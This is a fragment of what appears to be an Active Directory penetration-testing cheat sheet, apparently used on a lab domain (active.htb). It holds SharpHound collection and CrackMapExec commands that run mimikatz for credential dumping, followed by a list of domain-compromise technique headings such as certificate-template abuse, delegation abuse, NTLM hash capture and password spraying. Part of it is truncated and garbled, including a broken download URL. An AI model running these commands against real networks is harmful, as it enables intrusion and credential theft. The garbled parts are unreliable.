

# run the collector on the machine using SharpHound.exe
# /usr/lib/bloodhound/resources/app/Collectors/SharpHound.exe
\SharpHound.exe -c all -d active.htb --searchforest

cme mimikatz --server http --server-port 80 14.0/24 -u user -p 'Password ' --local-auth -M mimikatz
cme smb -M name_module -o VAR=DATA

# use the latest release, CME is now a binary packaged with all its dependencies
wget https:// /byt3bl33d3r/CrackMapExec/releases/download/v5.


- MS-EFSRPC Abuse with Unconstrained Delegation
- SpoolService Abuse with Unconstrained Delegation

- Privileged Access Management (PAM) Trust
- Forest to Forest Compromise - Trust Ticket
- Child Domain to Forest Compromise - SID Hijacking
- GenericWrite and Remote Connection Manager
- ESC7 - Vulnerable Certificate Authority Access Control
- ESC3 - Misconfigured Enrollment Agent Templates
- ESC2 - Misconfigured Certificate Templates
- ESC1 - Misconfigured Certificate Templates
- DNS Poisoning - Relay delegation with mitm6
- Capturing and cracking Net-NTLMv2/NTLMv2 hashes
- Capturing and cracking Net-NTLMv1/NTLMv1 hashes
- Password of Pre-Created Computer Account
- Spray passwords against the RDP service
- Passwords in SYSVOL & Group Policy Preferences
- SCF and URL file attack against writeable share
